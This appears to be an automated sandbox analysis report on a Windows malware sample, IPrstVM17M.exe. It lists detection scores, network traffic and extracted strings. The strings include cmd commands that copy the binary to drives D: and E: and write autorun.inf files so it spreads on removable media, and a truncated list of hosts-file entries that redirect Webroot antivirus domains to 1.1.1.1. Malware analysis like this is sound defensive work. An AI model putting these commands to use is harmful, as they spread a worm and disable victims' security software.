Source: IPrstVM17M.exe |
ReversingLabs: Detection: 15% |
Source: IPrstVM17M.exe |
Virustotal: Detection: 14% |
Source: C:\Users\user\AppData\Local\Temp\bin.exe |
Joe Sandbox ML: detected |
Source: IPrstVM17M.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: unknown |
HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2 |
Source: IPrstVM17M.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: |
Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr |
Source: |
Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr |
Source: IPrstVM17M.exe |
Binary or memory string: echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo open=bin.exe >> D:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo open=bin.exe >> E:\autorun.inf |
Source: IPrstVM17M.exe |
Binary or memory string: echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo [autorun] > D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo open=bin.exe >> D:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo [autorun] > E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: echo open=bin.exe >> E:\autorun.inf |
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string:
copy /v /y "%s" D:\bin.exe
echo [autorun] > D:\autorun.inf
echo open=bin.exe >> D:\autorun.inf
copy /v /y "%s" E:\bin.exe
echo [autorun] > E:\autorun.inf
echo open=bin.exe >> E:\autorun.inf
Started blocking antiviruses...
1.1.1.1 mail.webroot.com
C:\Windows\System32\drivers\etc\hosts
1.1.1.1 carbonite.webroot.com
1.1.1.1 e.webroot.com
1.1.1.1 entupdates-cdn.webroot.com
1.1.1.1 lp-carbonite.webroot.com
1.1.1.1 lp.webroot.com
1.1.1.1 technet.webroot.com
1.1.1.1 cms.webroot.com
1.1.1.1 partner.webroot.com
1.1.1.1 lp-carbonite-sandbox.webroot.com
1.1.1.1 smtp-co.webroot.com
1.1.1.1 smtp-ca.webroot.com
1.1.1.1 vdi.webroot.com
1.1.1.1 es.webroot.com
1.1.1.1 usmail.webroot.com
1.1.1.1 sftp.webroot.com
1.1.1.1 lyncdiscover.webroot.com
1.1.1.1 fr.webroot.com
1.1.1.1 it.webroot.com
1.1.1.1 dnsptest.webroot.com
1.1.1.1 bounce2.webroot.com
1.1.1.1 provisioningdev1.webroot.com
1.1.1.1 nl.webroot.com
1.1.1.1 mobiletest.webroot.com
1.1.1.1 support-nl.webroot.com
1.1.1.1 support-es.webroot.com
1.1.1.1 sip.webroot.com
1.1.1.1 contentr.webroot.com
1.1.1.1 childsafe.webroot.com
1.1.1.1 spyware.webroot.com
1.1.1.1 testvpn.webroot.com
1.1.1.1 support-de.webroot.com
1.1.1.1 support-au.webroot.com
1.1.1.1 support-fr.webroot.com
1.1.1.1 support-it.webroot.com
1.1.1.1 extranet.webroot.com
1.1.1.1 sso-tst.webroot.com
1.1.1.1 uk.webroot.com
1.1.1.1 bb.webroot.com
1.1.1.1 ncmec.webroot.com
1.1.1.1 stage.webroot.com
1.1.1.1 provisioningtest2.webroot.com
1.1.1.1 websrv-stg.webroot.com
1.1.1.1 de.webroot.com
1.1.1.1 computer-security.webroot.com
1.1.1.1 reseller.webroot.com
1.1.1.1 connectuk.webroot.com
1.1.1.1 vpn.webroot.com
1.1.1.1 outbound5.webroot.com
1.1.1.1 outbound2.webroot.com
1.1.1.1 outbound3.webroot.com
1.1.1.1 provisioningtest5.webroot.com
1.1.1.1 view.webroot.com
1.1.1.1 provisioningdev.webroot.com
1.1.1.1 mydata.webroot.com
1.1.1.1 provisioningtest4.webroot.com
1.1.1.1 sfdcstage.webroot.com
1.1.1.1 provisioning.webroot.com
1.1.1.1 channeledge.webroot.com
1.1.1.1 www2.webroot.com
1.1.1.1 provisioningtest3.webroot.com
1.1.1.1 mx.webroot.com
1.1.1.1 support-enterprise.webroot.com
1.1.1.1 autodiscover.webroot.com
1.1.1.1 ws.webroot.com
1.1.1.1 owauk.webroot.com
1.1.1.1 outbound1.webroot.com
1.1.1.1 research.webroot.com
1.1.1.1 access-tst.webroot.com
1.1.1.1 vpnuk.webroot.com
1.1.1.1 ws-stg.webroot.com
1.1.1.1 outbound4.webroot.com
1.1.1.1 provisioningdev2.webroot.com
1.1.1.1 myproduct.webroot.com
1.1.1.1 labs.webroot.com
1.1.1.1 tunnelfe.webroot.com
1.1.1.1 mailbox.webroot.com
1.1.1.1 outbound.webroot.com
1.1.1 |